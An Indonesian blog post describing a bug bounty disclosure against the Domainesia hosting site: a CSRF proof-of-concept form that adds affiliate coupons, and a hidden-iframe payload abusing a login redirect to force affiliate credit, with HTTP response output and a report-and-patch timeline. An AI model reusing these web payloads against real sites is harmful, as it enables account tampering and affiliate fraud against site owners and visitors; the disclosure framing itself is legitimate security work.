Friday, December 21, 2018

Perburuan Bug Bounty Di Situs Domainesia Yang Di Lakukan Oleh Eka Syawan ( RadenVodka )

Perburuan Bug Bounty Di Situs Domainesia Yang Di Lakukan Oleh Eka Syawah ( RadenVodka )

Domainesia.... mungkin anda akan berfikir situs penyedia hosting dan domain murah...
sebenar nya situs-situs besar jarang sekali memiliki bug bisa di bilang sempurna lah untuk sekelas penyedia hosting dan domain besar ini.

Mas eka syahwan sendiri melakukan pencarian bug di situs domainesia karena faktor bosan ingin berbuat apa dan yang menjadi bahan pelampiasan nya situs domainesia ( gabutan gayn ).ternyata oh ternyata mas eka syahwan ternyata menemukan 2 bug pada situs domainesia.

Bug yang pertama di temukan oleh mas eka syahwan sendiri bug csrf. apa itu csrf ? baca artikel nya di sini

pada bug csrf ini mas eka syahwan sendiri mencoba melakukan penambahan kupon affiliasi ternyata berhasil..

Untuk Proof Of Concept ( POC ) :

<form action=”https://my.domainesia.com/index.php?m=affcoupons" method=”POST”> <input type=”hidden” name=”token”> <input type=”hidden” name=”cmd” value=”add”> <input type=”hidden” name=”code” value=”xc”> <input type=”hidden” name=”type” value=”UGVyY2VudGFnZUAxQDIwQEAxMDQsMTA1LDEwNiwxMDcsMTA4LDExMiwxMTMsMTE0QEAwQDBAMEAw”> <input type=”submit” name=”Submit” value=”Add+New+Coupon”> </form>
Untuk lebih jelas nya anda bisa melihat video nya langsung :



Bug yang kedua di temukan oleh mas eka syahwan adalah bug bypass affiliate

menurut mas eka syahwan sendiri dampak dari  bug ini jelas  sangat menguntungkan sekali bagi para pencari nafkah terlebih lagi jika anda memiliki situs yang memiliki traffict tinggi  karena attacker akan mendapatkan Affiliate secara paksa tanpa harus pengunjung klik banner.

Untuk skenario nya : 
https://www.domainesia.com/?aff=5340 jika anda mengunakan tautan ini dan di iframe tidak akan berhasil karena adanya
x-frame-options: SAMEORIGIN
oleh karena itu Attacker membuat sebuah iframe dan di taruh di web yang ramai.
<iframe style="display: none" src="https://my.domainesia.com/dologin.php?email=&timestamp=&hash=&goto=aff.php?aff=**5340**&incorrect=false"></iframe>
5340 merupakan ID affiliate
goto merupakan halaman redirect.
Contoh :
https://my.domainesia.com/dologin.php?email=&timestamp=&hash=&goto= xxx.php maka akan di ahlikan ke 
https://my.domainesia.com/xxx.php?incorrect=true
jadi bisa di simpulkan jika kita masukan https://my.domainesia.com/dologin.php?email=&timestamp=&hash=&goto=aff.php?aff=5340 &incorrect=false maka akan menjadi https://my.domainesia.com/aff.php?aff=5340

Untuk respons permintaan data :
Request URL: https://my.domainesia.com/dologin.php?email=&timestamp=&hash=&goto=aff.php?aff=5340&incorrect=false
Request Method: GET
Status Code: 302
Remote Address: 139.162.55.180:443

cache-control: max-age=0, no-cache, no-store, must-revalidate, post-check=0, pre-check=0
content-type: text/html; charset=utf-8
date: Sun, 16 Dec 2018 16:59:10 GMT
location: aff.php?aff=5340&incorrect=true
pragma: no-cache
server: nginx
set-cookie: xxxx=xxx; path=/; secure; HttpOnly
set-cookie: xxx=xxxx; path=/; secure; HttpOnly
status: 302
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-page-speed: Deneva
x-xss-protection: 1; mode=block

Untuk lebih jelas nya anda bisa melihat video nya: 


Untuk log pelaporan bug yang di lakukan oleh mas eka syahwan anda bisa melihat nya di bawah ini 

17.12.18 : Mengirimkan informasi bug/celah.
17.12.18 : Pihak domainesia mengkonfirmasi bahwa bug lagi proses perbaikan.
17.12.18 : Pihak domainesia mengkonfirmasi bahwa bug sudah di patch dan saya suruh melakukan pengecekan kembali. dan bug sudah di patch oleh pihak domainesia.
17.12.18 : Reward yang di dapatkan oleh mas eka syahwan ? pengalaman yang sangat berharga sekali bisa
                 menemukan bug di situs domainesia.

thanks to :

Untuk sedikit info sebenar nya eka syahwan melakukan pencarian bug bounty tepat nya pada tanggal 17 desember 2018 terimakasih.

No comments:

Post a Comment